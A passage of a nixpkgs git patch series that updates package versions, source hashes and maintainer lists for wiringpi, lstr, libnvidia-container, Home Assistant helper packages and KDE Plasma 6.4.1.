Subject: [PATCH 32/73] wiringpi: remove `with lib`, add ryand56 as maintainer

---
 pkgs/by-name/wi/wiringpi/package.nix | 11 +++++++----
 1 file changed, 7 insertions(+), 4 deletions(-)

diff --git a/pkgs/by-name/wi/wiringpi/package.nix b/pkgs/by-name/wi/wiringpi/package.nix
index b57e32c5d1c5..fa51adc7e33f 100644
--- a/pkgs/by-name/wi/wiringpi/package.nix
+++ b/pkgs/by-name/wi/wiringpi/package.nix
@@ -78,11 +78,14 @@ symlinkJoin {
     passthru.wiringPiD
     passthru.gpio
   ];
-  meta = with lib; {
+  meta = {
     description = "Gordon's Arduino wiring-like WiringPi Library for the Raspberry Pi (Unofficial Mirror for WiringPi bindings)";
     homepage = "https://github.com/WiringPi/WiringPi";
-    license = licenses.lgpl3Plus;
-    maintainers = with maintainers; [ doronbehar ];
-    platforms = platforms.linux;
+    license = lib.licenses.lgpl3Plus;
+    maintainers = with lib.maintainers; [
+      doronbehar
+      ryand56
+    ];
+    platforms = lib.platforms.linux;
   };
 }

From 4fe7209f36a2e9d9cb987b9cc6544e1d46cdc41e Mon Sep 17 00:00:00 2001
From: "R. Ryantm"
Date: Tue, 24 Jun 2025 07:34:04 +0000
Subject: [PATCH 33/73] lstr: 0.2.0 -> 0.2.1

---
 pkgs/by-name/ls/lstr/package.nix | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/pkgs/by-name/ls/lstr/package.nix b/pkgs/by-name/ls/lstr/package.nix
index e412a55f7714..4561ace0098c 100644
--- a/pkgs/by-name/ls/lstr/package.nix
+++ b/pkgs/by-name/ls/lstr/package.nix
@@ -11,16 +11,16 @@
 
 rustPlatform.buildRustPackage (finalAttrs: {
   pname = "lstr";
-  version = "0.2.0";
+  version = "0.2.1";
 
   src = fetchFromGitHub {
     owner = "bgreenwell";
     repo = "lstr";
     tag = "v${finalAttrs.version}";
-    hash = "sha256-Bg2tJYnXpJQasmcRv+ZIZAVteKUCuTgFKVRHw1CCiAQ=";
+    hash = "sha256-uaefVDSTphboWW1BP2HkcuMiW87FmnVYxCthlrAKF5Y=";
   };
 
-  cargoHash = "sha256-KlO/Uz9UPea4DFC6U4hvn4kOWSzUmYmckw+IUstcmeQ=";
+  cargoHash = "sha256-UVaqkNV1cNpbCNphk6YMqOz077xY9dUBgCGt7SLIH0U=";
 
   nativeBuildInputs = [ pkg-config ];
 

From 0c909a5522020455d518a7f028e4850d55080bf6 Mon Sep 17 00:00:00 2001
From: Paul Meyer
Date: Tue, 24 Jun 2025 10:27:40 +0200
Subject: [PATCH 34/73] libnvidia-container: 1.17.6 -> 1.17.8

Signed-off-by: Paul Meyer
---
 .../0001-ldcache-don-t-use-ldcache.patch      | 26 ++++++++++---------
 ...dia-docker-compatible-binary-lookups.patch |  2 +-
 .../li/libnvidia-container/package.nix        |  4 +--
 3 files changed, 17 insertions(+), 15 deletions(-)

diff --git a/pkgs/by-name/li/libnvidia-container/0001-ldcache-don-t-use-ldcache.patch b/pkgs/by-name/li/libnvidia-container/0001-ldcache-don-t-use-ldcache.patch
index 1a26140b8bee..35210d9b81cf 100644
--- a/pkgs/by-name/li/libnvidia-container/0001-ldcache-don-t-use-ldcache.patch
+++ b/pkgs/by-name/li/libnvidia-container/0001-ldcache-don-t-use-ldcache.patch
@@ -8,8 +8,8 @@ This patch hinders libnvidia-container from using the loader cache, which doesn'
  src/ldcache.c | 46 +++++++++++++++++-----------------------------
  src/ldcache.h | 2 +-
  src/nvc_info.c | 8 ++------
- src/nvc_ldcache.c | 2 +-
- 4 files changed, 21 insertions(+), 37 deletions(-)
+ src/nvc_ldcache.c | 4 ++--
+ 4 files changed, 22 insertions(+), 38 deletions(-)
 
 diff --git a/src/ldcache.c b/src/ldcache.c
 index 38bab0553208f66b2866ccea6cdb0faca4357f19..1c4acd52b622be4ca6accdc80da5a6fcf9ae67dd 100644
@@ -86,7 +86,7 @@ index 33d78dd7e21f65eb696535c115bbd2839a6c67ca..2b087dbca1a6a2946cd495e676a61e95
 #endif /* HEADER_LDCACHE_H */
 
 diff --git a/src/nvc_info.c b/src/nvc_info.c
-index b7b8adfa7c79c326a1acb481a06a05d1463e810f..cf4b1905fd2127c28ee16649501be122d3be5261 100644
+index bcc887b2345bd42a098f9b85d9c66fae2775f736..5eaef61ada5e955ab11c6a4eb8429c50468e3370 100644
 --- a/src/nvc_info.c
 +++ b/src/nvc_info.c
 @@ -217,15 +217,13 @@ find_library_paths(struct error *err, struct dxcore_context *dxcore, struct nvc_
@@ -122,15 +122,17 @@ index b7b8adfa7c79c326a1acb481a06a05d1463e810f..cf4b1905fd2127c28ee16649501be122
 }
 
 diff --git a/src/nvc_ldcache.c b/src/nvc_ldcache.c
-index db3b2f69692270e9058b2e26f18eb31677909d05..ae5def43b4cb3973af3aad55361265173ca938a7 100644
+index 0535090dafbae5a00acb707bbbb5a35dbcea4a7a..5de429f4c2ea62775403a5fc1ed0f23a6c88655c 100644
 --- a/src/nvc_ldcache.c
 +++ b/src/nvc_ldcache.c
-@@ -367,7 +367,7 @@ nvc_ldcache_update(struct nvc_context *ctx, const struct nvc_container *cnt)
-         if (validate_args(ctx, cnt != NULL) < 0)
-                 return (-1);
- 
--        argv = (char * []){cnt->cfg.ldconfig, "-f", "/etc/ld.so.conf", "-C", "/etc/ld.so.cache", cnt->cfg.libs_dir, cnt->cfg.libs32_dir, NULL};
-+        argv = (char * []){cnt->cfg.ldconfig, "-f", "/tmp/ld.so.conf.nvidia-host", "-C", "/tmp/ld.so.cache.nvidia-host", cnt->cfg.libs_dir, cnt->cfg.libs32_dir, NULL};
-         if (*argv[0] == '@') {
+@@ -482,8 +482,8 @@ nvc_ldcache_update(struct nvc_context *ctx, const struct nvc_container *cnt)
+          * See https://github.com/NVIDIA/libnvidia-container/issues/316 for an
+          * in-depth investigation.
+          */
+-        char *argv_default[] = {cnt->cfg.ldconfig, "-f", "/etc/ld.so.conf", "-C", "/etc/ld.so.cache", cnt->cfg.libs_dir, cnt->cfg.libs32_dir, NULL};
+-        char *argv_with_compat_dir[] = {cnt->cfg.ldconfig, "-f", "/etc/ld.so.conf", "-C", "/etc/ld.so.cache", cnt->cuda_compat_dir, cnt->cfg.libs_dir, cnt->cfg.libs32_dir, NULL};
++        char *argv_default[] = {cnt->cfg.ldconfig, "-f", "/tmp/ld.so.conf.nvidia-host", "-C", "/tmp/ld.so.cache.nvidia-host", cnt->cfg.libs_dir, cnt->cfg.libs32_dir, NULL};
++        char *argv_with_compat_dir[] = {cnt->cfg.ldconfig, "-f", "/tmp/ld.so.conf.nvidia-host", "-C", "/tmp/ld.so.cache.nvidia-host", cnt->cuda_compat_dir, cnt->cfg.libs_dir, cnt->cfg.libs32_dir, NULL};
+         if ((cnt->flags & OPT_CUDA_COMPAT_MODE_LDCONFIG) && (cnt->cuda_compat_dir != NULL)) {
          /*
-          * We treat this path specially to be relative to the host filesystem.
+          * We include the cuda_compat_dir directory on the ldconfig
diff --git a/pkgs/by-name/li/libnvidia-container/0002-nvc-nvidia-docker-compatible-binary-lookups.patch b/pkgs/by-name/li/libnvidia-container/0002-nvc-nvidia-docker-compatible-binary-lookups.patch
index 8abcee55719d..0a2b3e47ac45 100644
--- a/pkgs/by-name/li/libnvidia-container/0002-nvc-nvidia-docker-compatible-binary-lookups.patch
+++ b/pkgs/by-name/li/libnvidia-container/0002-nvc-nvidia-docker-compatible-binary-lookups.patch
@@ -9,7 +9,7 @@ This patch maintains compatibility with NixOS' `virtualisation.docker.enableNvid
  1 file changed, 4 insertions(+), 1 deletion(-)
 
 diff --git a/src/nvc_info.c b/src/nvc_info.c
-index cf4b1905fd2127c28ee16649501be122d3be5261..cdfa19721bc913d8e2adb96d106cd65ee6111623 100644
+index 5eaef61ada5e955ab11c6a4eb8429c50468e3370..cac87500213e961e603494ac842d02522fc46a5e 100644
 --- a/src/nvc_info.c
 +++ b/src/nvc_info.c
 @@ -249,10 +249,13 @@ find_binary_paths(struct error *err, struct dxcore_context* dxcore, struct nvc_d
diff --git a/pkgs/by-name/li/libnvidia-container/package.nix b/pkgs/by-name/li/libnvidia-container/package.nix
index 6f5119017601..41203992276e 100644
--- a/pkgs/by-name/li/libnvidia-container/package.nix
+++ b/pkgs/by-name/li/libnvidia-container/package.nix
@@ -32,13 +32,13 @@ let
 in
 stdenv.mkDerivation (finalAttrs: {
   pname = "libnvidia-container";
-  version = "1.17.6";
+  version = "1.17.8";
 
   src = fetchFromGitHub {
     owner = "NVIDIA";
     repo = "libnvidia-container";
     tag = "v${finalAttrs.version}";
-    hash = "sha256-kveP0Px9Fds7pS39aW+cqg2jtiQCMN2zG4GTGRqRrc0=";
+    hash = "sha256-OzjcYxnWjzgmrjERyPN3Ch3EQj4t1J5/TbATluoDESg=";
   };
 
   patches = [

From 336878fe043366c5bcac3f31b6bc6cb117f4e59a Mon Sep 17 00:00:00 2001
From: Paul Meyer
Date: Tue, 24 Jun 2025 11:53:20 +0200
Subject: [PATCH 35/73] libnvidia-container: add katexochen as maintainer

Signed-off-by: Paul Meyer
---
 pkgs/by-name/li/libnvidia-container/package.nix | 1 +
 1 file changed, 1 insertion(+)

diff --git a/pkgs/by-name/li/libnvidia-container/package.nix b/pkgs/by-name/li/libnvidia-container/package.nix
index 41203992276e..684d303c2e64 100644
--- a/pkgs/by-name/li/libnvidia-container/package.nix
+++ b/pkgs/by-name/li/libnvidia-container/package.nix
@@ -175,6 +175,7 @@ stdenv.mkDerivation (finalAttrs: {
     maintainers = with lib.maintainers; [
       cpcloud
       msanft
+      katexochen
     ];
   };
 })

From 068d936b01123930afef3f388cececf739a4ae31 Mon Sep 17 00:00:00 2001
From: Martin Weinelt
Date: Tue, 24 Jun 2025 13:13:17 +0200
Subject: [PATCH 36/73] python3Packages.homeassistant-stubs: 2025.6.1 -> 2025.6.2

https://github.com/KapJI/homeassistant-stubs/releases/tag/2025.6.2
---
 pkgs/servers/home-assistant/stubs.nix | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/pkgs/servers/home-assistant/stubs.nix b/pkgs/servers/home-assistant/stubs.nix
index 469f84ad4442..f2f9e0777792 100644
--- a/pkgs/servers/home-assistant/stubs.nix
+++ b/pkgs/servers/home-assistant/stubs.nix
@@ -10,7 +10,7 @@
 
 buildPythonPackage rec {
   pname = "homeassistant-stubs";
-  version = "2025.6.1";
+  version = "2025.6.2";
   pyproject = true;
 
   disabled = python.version != home-assistant.python.version;
@@ -19,7 +19,7 @@ buildPythonPackage rec {
     owner = "KapJI";
     repo = "homeassistant-stubs";
     tag = version;
-    hash = "sha256-JTSIVe25EXZ7Bslkcz8/wLFJDx3f78OGsfDodtHMZ/Y=";
+    hash = "sha256-Hdk7Lf0J4wgx+xhrKtBgBtO+DzCqQ2sih5DaoYcsWww=";
   };
 
   build-system = [

From b48485fd372114c510e2b50a223d803df595a56d Mon Sep 17 00:00:00 2001
From: Martin Weinelt
Date: Tue, 24 Jun 2025 13:13:55 +0200
Subject: [PATCH 37/73] home-assistant.python.pkgs.pytest-homeassistant-custom-component: 0.13.251 -> 0.13.253

https://github.com/MatthewFlamm/pytest-homeassistant-custom-component/blob/refs/tags/0.13.253/CHANGELOG.md
---
 .../pytest-homeassistant-custom-component.nix | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/pkgs/servers/home-assistant/pytest-homeassistant-custom-component.nix b/pkgs/servers/home-assistant/pytest-homeassistant-custom-component.nix
index cb9ef628b7f5..7357971e2c3d 100644
--- a/pkgs/servers/home-assistant/pytest-homeassistant-custom-component.nix
+++ b/pkgs/servers/home-assistant/pytest-homeassistant-custom-component.nix
@@ -18,7 +18,7 @@
 
 buildPythonPackage rec {
   pname = "pytest-homeassistant-custom-component";
-  version = "0.13.251";
+  version = "0.13.253";
   pyproject = true;
 
   disabled = pythonOlder "3.13";
@@ -27,7 +27,7 @@ buildPythonPackage rec {
     owner = "MatthewFlamm";
     repo = "pytest-homeassistant-custom-component";
     rev = "refs/tags/${version}";
-    hash = "sha256-S+BC3ohAsY11SdZZdlETskCAopKeohgb16vMpko01YY=";
+    hash = "sha256-P2ZYOHUc8tTzwSSUGKdm+zQD4hgVpewkKSg3GRpF70M=";
   };
 
   build-system = [ setuptools ];

From ac9539cd82b477082f13dcc79943774f7b07ad2c Mon Sep 17 00:00:00 2001
From: K900
Date: Tue, 24 Jun 2025 15:18:54 +0300
Subject: [PATCH 38/73] kdePackages: Plasma 6.4.0 -> 6.4.1

---
 pkgs/kde/generated/sources/plasma.json | 414 ++++++++++++------------
 1 file changed, 207 insertions(+), 207 deletions(-)

diff --git a/pkgs/kde/generated/sources/plasma.json b/pkgs/kde/generated/sources/plasma.json
index a8efae02fd77..c41e5437e303 100644
--- a/pkgs/kde/generated/sources/plasma.json
+++ b/pkgs/kde/generated/sources/plasma.json
@@ -1,347 +1,347 @@
 {
   "aurorae": {
-    "version": "6.4.0",
-    "url": "mirror://kde/stable/plasma/6.4.0/aurorae-6.4.0.tar.xz",
-    "hash": "sha256-VjxChfQmhIJW6SyISgWKVy1Z31q5pMi5BzhSJuxKwLI="
+    "version": "6.4.1",
+    "url": "mirror://kde/stable/plasma/6.4.1/aurorae-6.4.1.tar.xz",
+    "hash": "sha256-4hZ73nLjVc0AZXOeqNLNnR3z9D6beAn8VwKzs1K7/WU="
   },
   "bluedevil": {
-    "version": "6.4.0",
-    "url": "mirror://kde/stable/plasma/6.4.0/bluedevil-6.4.0.tar.xz",
-    "hash": "sha256-8yb1EFCmDqwRNlKeFojg3ZAL1brP3cDn3ZQbLXV2rrk="
+    "version": "6.4.1",
+    "url": "mirror://kde/stable/plasma/6.4.1/bluedevil-6.4.1.tar.xz",
+    "hash": "sha256-mtR03dabzoVJgNMEL96JBb2UBZ/aqoAEJcds12J+Bu8="
  },
   "breeze": {
-    "version": "6.4.0",
-    "url":
"mirror://kde/stable/plasma/6.4.0/breeze-6.4.0.tar.xz", - "hash": "sha256-z9s48KTixCjpylpf0SQAtoBKvN1TWbY2+lMno1Eh6GY=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/breeze-6.4.1.tar.xz", + "hash": "sha256-T+AIX/ohsuOu9J3E5chi8i7xM5WpaBOHqZAwh0PwHFU=" }, "breeze-grub": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/breeze-grub-6.4.0.tar.xz", - "hash": "sha256-syzAxAqtGM7tbowlxlTc/ELUbd2Zm8oFBKCSlZhvYwI=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/breeze-grub-6.4.1.tar.xz", + "hash": "sha256-c6yyJ5vbMtXpeqeHha4P6vBuQnQTtNvR3LZbu9zacwM=" }, "breeze-gtk": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/breeze-gtk-6.4.0.tar.xz", - "hash": "sha256-WFJjJxTE17d1SBUe9efe2t7TMfbpARGxbdcQ4Bu6j60=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/breeze-gtk-6.4.1.tar.xz", + "hash": "sha256-4Qj+nLx2oPUf2N+cYw05l4o8H7bPrznZqy9VVJRie1g=" }, "breeze-plymouth": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/breeze-plymouth-6.4.0.tar.xz", - "hash": "sha256-S1DBCbItJbH7YT/K5Qq+NbEAuQgyaudqPdgydMoPTPI=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/breeze-plymouth-6.4.1.tar.xz", + "hash": "sha256-JSE/12TBsME2nbqFASXjsC2ZkKuQwcZ0PKodCHy3BkU=" }, "discover": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/discover-6.4.0.tar.xz", - "hash": "sha256-CfsdY6puw61W5gb0i24Q1Z7rN9m1J+VKIRtKedblIkI=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/discover-6.4.1.tar.xz", + "hash": "sha256-80zqQ4qKCuC7b9E+QWTUnHoqmFfiBDAMzCdvLV+JgjA=" }, "drkonqi": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/drkonqi-6.4.0.tar.xz", - "hash": "sha256-BGqJ475WIGBu2tlF6/L1KHWlytZ0A8Ha86G/5ShoPqI=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/drkonqi-6.4.1.tar.xz", + "hash": "sha256-REnekqvM46h7RyeWQffxcmqo0C5vMVSPDzJ3ks6C/UM=" }, "flatpak-kcm": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/flatpak-kcm-6.4.0.tar.xz", - "hash": "sha256-KCw6dSf4sdsTLaB992jXLFK7yj4n8iFvS6ahcx3QTeI=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/flatpak-kcm-6.4.1.tar.xz", + "hash": "sha256-27UINtKXUF5efF/LKeIrb/IbUtBE7gf4QriZlMXapd4=" }, "kactivitymanagerd": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/kactivitymanagerd-6.4.0.tar.xz", - "hash": "sha256-zVaf4lsNZwHDMOCPw+3lfVf/guluxtNH51dbsy+qurs=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/kactivitymanagerd-6.4.1.tar.xz", + "hash": "sha256-tt1cG4TT0ucNt58W7O/iOsr1PEX9XCursu6ZS0ZsrJk=" }, "kde-cli-tools": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/kde-cli-tools-6.4.0.tar.xz", - "hash": "sha256-T06+18F6JQecVO8DGSmsVdZ3es089ZXKY0P00KTwC6k=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/kde-cli-tools-6.4.1.tar.xz", + "hash": "sha256-LZCrDANPudKBZ1Dams45twi3EtP3NBZj67v+iNWwLKQ=" }, "kde-gtk-config": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/kde-gtk-config-6.4.0.tar.xz", - "hash": "sha256-ygZtqEJyKAw/1qGBlw2U854Re+yM7pHXGi4lLCFF788=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/kde-gtk-config-6.4.1.tar.xz", + "hash": "sha256-S79X5NeYqJnD8SM1BClZrvz11q81SwSJXk6N3ujIxD4=" }, "kdecoration": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/kdecoration-6.4.0.tar.xz", - "hash": "sha256-pMyMS8dB0KQj11DO1m4UG5uY/McUaKshDlTaOCFTtYA=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/kdecoration-6.4.1.tar.xz", + 
"hash": "sha256-obRAHtr3/iFjw+HKtUjZPDExlXuFNPISSe787uSW4SI=" }, "kdeplasma-addons": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/kdeplasma-addons-6.4.0.tar.xz", - "hash": "sha256-XwS3FmjLhADglL7Oa7bHRra7k2W8EWk4tm2Kq9hJNVo=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/kdeplasma-addons-6.4.1.tar.xz", + "hash": "sha256-iUv51ID9vwo+AFczkVNaQemlfO5yP7rQ+NosFtKZ0vY=" }, "kgamma": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/kgamma-6.4.0.tar.xz", - "hash": "sha256-IRQh+vjZAB3JNgkv0fTyEVNIWvQ08AcfVdIovRo5xUg=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/kgamma-6.4.1.tar.xz", + "hash": "sha256-zClBxUYyHA9ACHqB4sPY1E6jhFA0wWQXmmOEtU7w+5A=" }, "kglobalacceld": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/kglobalacceld-6.4.0.tar.xz", - "hash": "sha256-9+Z6c2e2C9RTBVjvkZgN+ha7UA1VFutonrUAQeELDzI=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/kglobalacceld-6.4.1.tar.xz", + "hash": "sha256-PuOK9MlVHeZAoYZ9J4NS2BcUaSz3AAwg0Z3CYuBL9DM=" }, "kinfocenter": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/kinfocenter-6.4.0.tar.xz", - "hash": "sha256-TS3q9MH/dv8QDtawfXyxWLoRbEwiG3tfeyVEAoUFRJQ=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/kinfocenter-6.4.1.tar.xz", + "hash": "sha256-IOr7rnikN/dnuLbpSTh1sjADP5dgRUcy6BBIPIISeSc=" }, "kmenuedit": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/kmenuedit-6.4.0.tar.xz", - "hash": "sha256-SuSmetygfhDCR1uaGay9KD0YQKmWu8CE2bGyN8fm74g=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/kmenuedit-6.4.1.tar.xz", + "hash": "sha256-VdsXXw897aYVS/sMchrfGD9jwTS3eFjJ+74IWK6cd3M=" }, "kpipewire": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/kpipewire-6.4.0.tar.xz", - "hash": "sha256-1ZdmWk7lekmT2QjmIVEkKumlo6JedtC6AD85ymhp41o=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/kpipewire-6.4.1.tar.xz", + "hash": "sha256-Npbf0ZtT5e+h57xpDDggkZuLvcDXj5Z3nMOzGekDX+I=" }, "krdp": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/krdp-6.4.0.tar.xz", - "hash": "sha256-78FnobeNIWoopi/TzJmBhQKGK6hB7/F1k+4VchzhRdU=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/krdp-6.4.1.tar.xz", + "hash": "sha256-zoGR8xXF9HBGuZh/Uv/wqI/8P51AmJ7yQj8QuY4sWMI=" }, "kscreen": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/kscreen-6.4.0.tar.xz", - "hash": "sha256-5M7giQpTQFMVH6XoU3Ktgukmm5TNPcMytzfDbEcRcn8=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/kscreen-6.4.1.tar.xz", + "hash": "sha256-w6KFacTwkt74RWTpFi64p/poGo9GWKFNgkNuohdU3Fs=" }, "kscreenlocker": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/kscreenlocker-6.4.0.tar.xz", - "hash": "sha256-uEAgK6a1vXgyqyEWvu4sjjhvqbhE5tsOQlqEAGtmmPo=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/kscreenlocker-6.4.1.tar.xz", + "hash": "sha256-yEnck5oFCibycDk/i1nouG1nGYOnUuAUr3yJoclVuSU=" }, "ksshaskpass": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/ksshaskpass-6.4.0.tar.xz", - "hash": "sha256-zjx7qfFmOOteA3iCFEioS5oGGSKL6BluVcOV/U10OAY=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/ksshaskpass-6.4.1.tar.xz", + "hash": "sha256-VJXbLUX5sqxQqBOC9+OMmauD1+o0rc9ysFwmDZ2KNDM=" }, "ksystemstats": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/ksystemstats-6.4.0.tar.xz", - "hash": "sha256-4PiFWk25FQgGa52lEI3bzki7rdpku5ZlOsL7MS/BRo4=" + "version": "6.4.1", + 
"url": "mirror://kde/stable/plasma/6.4.1/ksystemstats-6.4.1.tar.xz", + "hash": "sha256-pwp0070kEW9gAQhrlCzJ1p91FPP1t8KgOC1dwoHn8Ko=" }, "kwallet-pam": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/kwallet-pam-6.4.0.tar.xz", - "hash": "sha256-RQ5Na4BMWX61EVkADhk2iJJuTYIlrhmhYn4l0R/ri14=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/kwallet-pam-6.4.1.tar.xz", + "hash": "sha256-BNTXB1y5PKwQp+BQSDbZYcei7aTwiYe7UA+ScgApi3w=" }, "kwayland": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/kwayland-6.4.0.tar.xz", - "hash": "sha256-CmSafVAjcCLJsMDz798qe/vreU43zzdcohkOZLXR2x8=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/kwayland-6.4.1.tar.xz", + "hash": "sha256-f48oQSL/2kTF4dZEJ76QWcoj9an78JLiod5tQd5FhiU=" }, "kwayland-integration": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/kwayland-integration-6.4.0.tar.xz", - "hash": "sha256-olIYm9HKCRWbtweBb/nVUqWzAJMpyTCg6YN3KEvw8Rw=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/kwayland-integration-6.4.1.tar.xz", + "hash": "sha256-IQk2AksNGsr5zZOo94SjSBBhno6zVvaPAgVHU1QK5gs=" }, "kwin": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/kwin-6.4.0.tar.xz", - "hash": "sha256-DTSSMXpxmmRb8ok/ysIbspeWBrrzcDYQ5Va1961U3mo=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/kwin-6.4.1.tar.xz", + "hash": "sha256-1OQwbJbMLouoYw6sMjT7wIVoWwCrxeWvwsLBxsb8pNQ=" }, "kwin-x11": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/kwin-x11-6.4.0.tar.xz", - "hash": "sha256-dtfAGOtu5lcpLIkquc50CYKQ7uB8P9+p18UxSX2OW3c=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/kwin-x11-6.4.1.tar.xz", + "hash": "sha256-eYy9ba9fstfr20lOaxLzmp7A4CWicjNiEhOWYUEgfAs=" }, "kwrited": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/kwrited-6.4.0.tar.xz", - "hash": "sha256-ZCxWdKsNlcoKQtbRstrKtf+/wGcZgZUo+iUVPGimRUo=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/kwrited-6.4.1.tar.xz", + "hash": "sha256-qApe1F7WM/Fc86QrLZVmCNnmpaePJn3zOslqr8wg2NQ=" }, "layer-shell-qt": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/layer-shell-qt-6.4.0.tar.xz", - "hash": "sha256-K55BM9Cb6Fji7mEHpWir0xoWC0ZlRatLZjEcaDlcd7A=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/layer-shell-qt-6.4.1.tar.xz", + "hash": "sha256-54HK3sALTDibkUPLOkDfd4iqTU0hHIhH9rm2UXbm6c4=" }, "libkscreen": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/libkscreen-6.4.0.tar.xz", - "hash": "sha256-4kBHbhXFfoWnkQf++9zLBwgoiaSUtXqlx8Tm8gjpEho=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/libkscreen-6.4.1.tar.xz", + "hash": "sha256-dBU8GUDd7sCZuhIMenm7yzn/42NE581cQ2CHdq9bLRQ=" }, "libksysguard": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/libksysguard-6.4.0.tar.xz", - "hash": "sha256-v9C695c0B0RAk+E6XOKzEM7lhuO7xdThB4W8Gg1FpmM=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/libksysguard-6.4.1.tar.xz", + "hash": "sha256-fDOUnb3MzuzjX779JEpESbI7UHHgytCC+RruZPeygeE=" }, "libplasma": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/libplasma-6.4.0.tar.xz", - "hash": "sha256-/4bw2QYlS7yfkQfzg7Gfu1un2yQ/q38tfSeP6DFGNUw=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/libplasma-6.4.1.tar.xz", + "hash": "sha256-O6Tx+KmWix0zlWT5GzOBjoDmEt5+U0WREXJGlj0scXs=" }, "milou": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/milou-6.4.0.tar.xz", - "hash": 
"sha256-7SWKx4tH2O7oFxOIq8EtxzuvP+gkK8EZpqMUMdfbPzA=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/milou-6.4.1.tar.xz", + "hash": "sha256-IZQ2nUxFpTe3kyK/3T7MUlL7Vd/Y968hA8j3t9ouUIA=" }, "ocean-sound-theme": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/ocean-sound-theme-6.4.0.tar.xz", - "hash": "sha256-r6ZyqRyuqaNPn+aZA7/02M+ZsWOT21LVRvq+K1uOp3M=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/ocean-sound-theme-6.4.1.tar.xz", + "hash": "sha256-o/ddckD0SKRnOT6xTxQxrAsFNf5JKYyf+hdLAFAJl/M=" }, "oxygen": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/oxygen-6.4.0.tar.xz", - "hash": "sha256-p29NbjoPnvZzq3W3sULfUTbYevHwlMz63Svm5s5sLCQ=" + "version": "6.4.1", + "url": "mirror://kde/stable/plasma/6.4.1/oxygen-6.4.1.tar.xz", + "hash": "sha256-b5siN5HxUR5v7sS2i6YDThJF4D6iHRMf4YxKhJdVRqU=" }, "oxygen-sounds": { - "version": "6.4.0", - "url": "mirror://kde/stable/plasma/6.4.0/oxygen-sounds-6.4.0.tar.xz", - "hash": 